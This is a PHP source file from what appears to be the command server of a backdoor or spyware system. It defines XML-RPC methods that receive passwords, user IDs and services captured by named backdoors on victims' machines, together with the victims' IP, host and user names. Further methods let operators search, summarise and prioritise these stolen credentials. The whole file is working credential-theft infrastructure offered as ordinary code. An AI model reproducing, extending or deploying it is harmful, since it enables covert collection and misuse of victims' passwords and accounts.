<?php

//////////
///
///   log_password.inc.php
///
//////////

require_once('lib/commons.inc.php');



/*************\
*   METHODS   *
\*************/

if($al & AL_SERV) {
   $dm['log_password.add']                 ['function'] = 'log_password_add';
//   $dm['log_password.add']                ['signature'] = array(array($xmlrpcBoolean,   // return value
//                                                                      $xmlrpcString,    // $backdoor
//                                                                      $xmlrpcString,    // $remoteip
//                                                                      $xmlrpcString,    // $remotehost
//                                                                      $xmlrpcString,    // $remoteuser
//                                                                      $xmlrpcArray));   // $logarray
}

if($al & AL_VIEW) {
   $dm['log_password.getparam']            ['function'] = 'log_password_getparam';
//   $dm['log_password.getparam']           ['signature'] = array(array($xmlrpcStruct,     // return value
//                                                                      $xmlrpcArray,      // $selarray
//                                                                      $xmlrpcArray,      // $backdoorarray
//                                                                      $xmlrpcArray,      // $remoteiparray
//                                                                      $xmlrpcArray,      // $remotehostarray
//                                                                      $xmlrpcArray,      // $remoteuserarray
//                                                                      $xmlrpcArray,      // $tagarray
//                                                                      $xmlrpcArray,      // $acquiredarray
//                                                                      $xmlrpcString));   // $searchstring
}

if($al & AL_VIEW) {
   $dm['log_password.getgeneral']          ['function'] = 'log_password_getgeneral';
//   $dm['log_password.getgeneral']         ['signature'] = array(array($xmlrpcArray,     // return value
//                                                                      $xmlrpcArray,     // $selarray
//                                                                      $xmlrpcArray,     // $backdoorarray
//                                                                      $xmlrpcArray,     // $remoteiparray
//                                                                      $xmlrpcArray,     // $remotehostarray
//                                                                      $xmlrpcArray,     // $remoteuserarray
//                                                                      $xmlrpcArray,     // $tagarray
//                                                                      $xmlrpcArray,     // $acquiredarray
//                                                                      $xmlrpcString,    // $searchstring
//                                                                      $xmlrpcArray));   // $resourcearray
}

if($al & AL_VIEW) {
   $dm['log_password.getdetail']           ['function'] = 'log_password_getdetail';
//   $dm['log_password.getdetail']          ['signature'] = array(array($xmlrpcArray,     // return value
//                                                                      $xmlrpcArray,     // $selarray
//                                                                      $xmlrpcArray,     // $backdoorarray
//                                                                      $xmlrpcArray,     // $remoteiparray
//                                                                      $xmlrpcArray,     // $remotehostarray
//                                                                      $xmlrpcArray,     // $remoteuserarray
//                                                                      $xmlrpcArray,     // $tagarray
//                                                                      $xmlrpcArray,     // $acquiredarray
//                                                                      $xmlrpcString,    // $searchstring
//                                                                      $xmlrpcArray,     // $resourcearray
//                                                                      $xmlrpcInt));     // $limit
}

if($al & AL_VIEW) {
   $dm['log_password.setgrouppriority']    ['function'] = 'log_password_setgrouppriority';
//   $dm['log_password.setgrouppriority']   ['signature'] = array(array($xmlrpcBoolean,    // return value
//                                                                      $xmlrpcArray,      // $selarray
//                                                                      $xmlrpcArray,      // $linearray
//                                                                      $xmlrpcInt));      // $priority
}



/***************\
*   FUNCTIONS   *
\***************/

function log_password_add($backdoor, $remoteip, $remotehost, $remoteuser, $logarray)
{
   // varchar1  <= resource
   // varchar2  <= service
   // varchar3  <= password
   // varchar4  <= userid
   // int1      <= -
   // int2      <= -
   // int3      <= -
   // longtext1 <= -
   // longblob1 <= -

   $ret = db_escape(array(&$backdoor,
                          &$remoteip,
                          &$remotehost,
                          &$remoteuser,
                          &$logarray));

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `backdoor_id` ";
   $sql .= "FROM `backdoor` ";
   $sql .= "WHERE `backdoor` = '$backdoor'";

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_config']['invbackdoor'];
   }

   $backdoor_id = $ret[0]->backdoor_id;

   foreach($logarray as $log) {
      $sql  = "SELECT `log_id` ";
      $sql .= "FROM `log` ";
      $sql .= "WHERE (`backdoor_id` = '$backdoor_id') AND ";
      $sql .=       "(`type` = 'PASSWORD') AND ";
      $sql .=       "(`remotehost` = '$remotehost') AND ";
      $sql .=       "(`remoteuser` = '$remoteuser') AND ";
      $sql .=       "(`varchar1` = '".$log['resource']."') AND ";
      $sql .=       "(`varchar2` = '".$log['service']."') AND ";
      $sql .=       "(`varchar3` = '".$log['password']."') AND ";
      $sql .=       "(`varchar4` = '".$log['userid']."')";

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      } else if($ret === false) {
         $sql  = "INSERT INTO `log` (`backdoor_id`, ";
         $sql .=                    "`type`, ";
         $sql .=                    "`remoteip`, ";
         $sql .=                    "`remotehost`, ";
         $sql .=                    "`remoteuser`, ";
         $sql .=                    "`received`, ";
         $sql .=                    "`acquired`, ";
         $sql .=                    "`varchar1`, ";
         $sql .=                    "`varchar2`, ";
         $sql .=                    "`varchar3`, ";
         $sql .=                    "`varchar4`) ";
         $sql .= "VALUES ('$backdoor_id', ";
         $sql .=         "'PASSWORD', ";
         $sql .=         "'$remoteip', ";
         $sql .=         "'$remotehost', ";
         $sql .=         "'$remoteuser', ";
         $sql .=         "UTC_TIMESTAMP(), ";
         $sql .=         "'".str_replace(':', '', $log['acquired']->scalar)."', ";
         $sql .=         "'".$log['resource']."', ";
         $sql .=         "'".$log['service']."', ";
         $sql .=         "'".$log['password']."', ";
         $sql .=         "'".$log['userid']."')";
      } else {
         $sql  = "UPDATE `log` ";
         $sql .= "SET `received` = UTC_TIMESTAMP() ";
         $sql .= "WHERE `log_id` = '".$ret[0]->log_id."'";
      }

      $ret = db_query($sql);

      if(is_object($ret)) {
         return $ret;
      }
   }

   return true;
}

function log_password_getparam($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT DISTINCT `varchar1` AS `resource` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'PASSWORD')";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? " AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."'))" : '');
   }
   if(count($acquiredarray)) {
      $sql .= " AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ")";
   }
   if($searchstring) {
      $sql .= " AND (0";
      foreach(array('varchar1', 'varchar2', 'varchar3', 'varchar4') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ")";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach(array('resource') as $field) {
      $tmp->$field = array();
      foreach($ret as $r) {
         array_push($tmp->$field, $r->$field);
      }
      $tmp->$field = array_unique($tmp->$field);
      sort($tmp->$field);
   }

   $ret = $tmp;

   return $ret;
}

function log_password_getgeneral($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $resourcearray)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$resourcearray));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT COUNT(`log_id`) AS `count`, ";
   $sql .=        "DATE_FORMAT(MIN(`acquired`), '%Y%m%dT%T') AS `begin`, ";
   $sql .=        "DATE_FORMAT(MAX(`acquired`), '%Y%m%dT%T') AS `end`, ";
   $sql .=        "LEAST(SUM(LENGTH(`longtext1`)), 1073741825) AS `size`, ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray') as $field) {
      $sql .= (count($$field) ? "`".str_replace('array', '', $field)."`, " : '');
   }
   $sql .= (count($resourcearray) ? "`varchar1` AS `resource`, " : '');
   $sql .=        "MAX(`tag`) AS `priority` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'PASSWORD') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('varchar1', 'varchar2', 'varchar3', 'varchar4') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= (count($resourcearray) ? "AND (`varchar1` IN ('".implode("', '", $resourcearray)."')) " : '');
   $sql .= "GROUP BY `type`";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? ", `".str_replace('array', '', $field)."`" : '');
   }
   $sql .= (count($resourcearray) ? ", `varchar1`" : '');

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->count, 'integer');
      xmlrpc_set_type($r->begin, 'datetime');
      xmlrpc_set_type($r->end, 'datetime');
      settype($r->priority, 'integer');
   }
   unset($r);

   return $ret;
}

function log_password_getdetail($selarray, $backdoorarray, $remoteiparray, $remotehostarray, $remoteuserarray, $tagarray, $acquiredarray, $searchstring, $resourcearray, $limit = -1)
{
   $ret = db_escape(array(&$selarray,
                          &$backdoorarray,
                          &$remoteiparray,
                          &$remotehostarray,
                          &$remoteuserarray,
                          &$tagarray,
                          &$acquiredarray,
                          &$searchstring,
                          &$resourcearray,
                          &$limit));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "SELECT `log_id` AS `log`, ";
   $sql .=        "`backdoor`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "DATE_FORMAT(`acquired`, '%Y%m%dT%T') AS `acquired`, ";
   $sql .=        "DATE_FORMAT(`received`, '%Y%m%dT%T') AS `received`, ";
   $sql .=        "`varchar1` AS `resource`, ";
   $sql .=        "`varchar2` AS `service`, ";
   $sql .=        "`varchar3` AS `password`, ";
   $sql .=        "`varchar4` AS `userid`, ";
   $sql .=        "`tag` AS `priority`, ";
   $sql .=        "COUNT(`note_id`) AS `notecount` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "LEFT JOIN `note` USING (`log_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."') AND ";
   $sql .=       "(`type` = 'PASSWORD') ";
   foreach(array('backdoorarray', 'remoteiparray', 'remotehostarray', 'remoteuserarray', 'tagarray') as $field) {
      $sql .= (count($$field) ? "AND (`".str_replace('array', '', $field)."` IN ('".implode("', '", $$field)."')) " : '');
   }
   if(count($acquiredarray)) {
      $sql .= "AND (0";
      foreach($acquiredarray as $acquired) {
         $sql .= " OR (`acquired` BETWEEN '".str_replace(':', '', $acquired['begin']->scalar)."' AND '".str_replace(':', '', $acquired['end']->scalar)."')";
      }
      $sql .= ") ";
   }
   if($searchstring) {
      $sql .= "AND (0";
      foreach(array('varchar1', 'varchar2', 'varchar3', 'varchar4') as $field) {
         $sql .= " OR (`$field` REGEXP '$searchstring')";
      }
      $sql .= ") ";
   }
   $sql .= (count($resourcearray) ? "AND (`varchar1` IN ('".implode("', '", $resourcearray)."')) " : '');
   $sql .= "GROUP BY `log_id`";
   if($limit >= 0) {
      $sql .= " ORDER BY `log_id` DESC";
      $sql .= " LIMIT $limit";
   }

   $ret = db_query($sql);

   if(is_object($ret)) {
      return $ret;
   } else if($ret === false) {
      return $GLOBALS['err_log']['empty'];
   }

   foreach($ret as &$r) {
      settype($r->log, 'integer');
      xmlrpc_set_type($r->acquired, 'datetime');
      xmlrpc_set_type($r->received, 'datetime');
      settype($r->priority, 'integer');
      settype($r->notecount, 'integer');
   }
   unset($r);

   return $ret;
}

function log_password_setgrouppriority($selarray, $linearray, $priority)
{
   $ret = db_escape(array(&$selarray,
                          &$linearray,
                          &$priority));

   if(is_object($ret)) {
      return $ret;
   }

   $ret = prunebackdoor($selarray);

   if(is_object($ret)) {
      return $ret;
   }

   $sql  = "REPLACE INTO `log` (`log_id`, ";
   $sql .=                     "`tag`, ";
   $sql .=                     "`type`, ";
   $sql .=                     "`backdoor_id`, ";
   $sql .=                     "`remoteip`, ";
   $sql .=                     "`remotehost`, ";
   $sql .=                     "`remoteuser`, ";
   $sql .=                     "`received`, ";
   $sql .=                     "`acquired`, ";
   $sql .=                     "`varchar1`, ";
   $sql .=                     "`varchar2`, ";
   $sql .=                     "`varchar3`, ";
   $sql .=                     "`varchar4`, ";
   $sql .=                     "`int1`, ";
   $sql .=                     "`int2`, ";
   $sql .=                     "`int3`, ";
   $sql .=                     "`longtext1`, ";
   $sql .=                     "`longblob1`) ";
   $sql .= "SELECT `log_id`, ";
   $sql .=        "$priority, ";
   $sql .=        "`type`, ";
   $sql .=        "`backdoor_id`, ";
   $sql .=        "`remoteip`, ";
   $sql .=        "`remotehost`, ";
   $sql .=        "`remoteuser`, ";
   $sql .=        "`received`, ";
   $sql .=        "`acquired`, ";
   $sql .=        "`varchar1`, ";
   $sql .=        "`varchar2`, ";
   $sql .=        "`varchar3`, ";
   $sql .=        "`varchar4`, ";
   $sql .=        "`int1`, ";
   $sql .=        "`int2`, ";
   $sql .=        "`int3`, ";
   $sql .=        "`longtext1`, ";
   $sql .=        "`longblob1` ";
   $sql .= "FROM `log` ";
   $sql .= "LEFT JOIN `backdoor` USING (`backdoor_id`) ";
   $sql .= "WHERE (`backdoor` IN ('".implode("', '", $selarray)."')) AND ";
   $sql .=       "(`type` = 'PASSWORD') AND ";
   if(count($linearray)) {
      $sql .= "(0";
      foreach($linearray as $line) {
         $sql .= " OR (1";
         foreach(array('backdoor', 'remoteip', 'remotehost', 'remoteuser') as $field) {
            $sql .= (isset($line[$field]) ? " AND (`$field` = '".$line[$field]."')" : '');
         }
         $sql .= (isset($line['priority']) ? " AND (`tag` = '".$line['priority']."')" : '');
         if(isset($line['search']) && $line['search']) {
            $sql .= " AND (0";
            foreach(array('varchar1', 'varchar2', 'varchar3', 'varchar4') as $field) {
               $sql .= " OR (`$field` REGEXP '".$line['search']."')";
            }
            $sql .= ")";
         }
         if(isset($line['begin']) && isset($line['end'])) {
            $sql .= " AND (`acquired` BETWEEN '".str_replace(':', '', $line['begin']->scalar)."' AND '".str_replace(':', '', $line['end']->scalar)."')";
         }
         $sql .= (isset($line['resource']) ? " AND (`varchar1` = '".$line['resource']."')" : '');
         $sql .= ")";
      }
      $sql .= ") AND ";
   }
   $sql .=       "(`log_id` <= '".$_SESSION['authmaxlog']."')";

   $ret = db_query($sql);

   return $ret;
}

?>
